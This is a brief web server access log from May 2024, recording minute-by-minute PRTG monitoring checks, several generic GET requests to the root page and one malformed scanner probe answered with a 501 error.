212.91.246.72 - - [02/May/2024:08:37:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.142.182.96 - - [02/May/2024:08:37:40 +0200] "GET / HTTP/1.1" 200 1229 "-" "-"
107.170.244.27 - - [02/May/2024:08:37:46 +0200] "MGLNDD_212.91.246.89_80" 501 338 "-" "-"
212.91.246.72 - - [02/May/2024:08:38:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [02/May/2024:08:38:20 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/May/2024:08:39:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
185.224.128.43 - - [02/May/2024:08:39:08 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
212.91.246.72 - - [02/May/2024:08:40:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:41:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
34.77.99.191 - - [02/May/2024:08:41:49 +0200] "GET / HTTP/1.1" 200 1229 "-" "python-requests/2.31.0"
212.91.246.72 - - [02/May/2024:08:42:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
212.91.246.72 - - [02/May/2024:08:43:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
45.156.129.46 - - [02/May/2024:08:43:29 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
212.91.246.72 - - [02/May/2024:08:44:01 +0200] "GET / HTTP/1.1" 200 1229 "-" "Mozilla/5.0 (compatible; PRTG Network Monitor (www.paessler.com); Windows)"
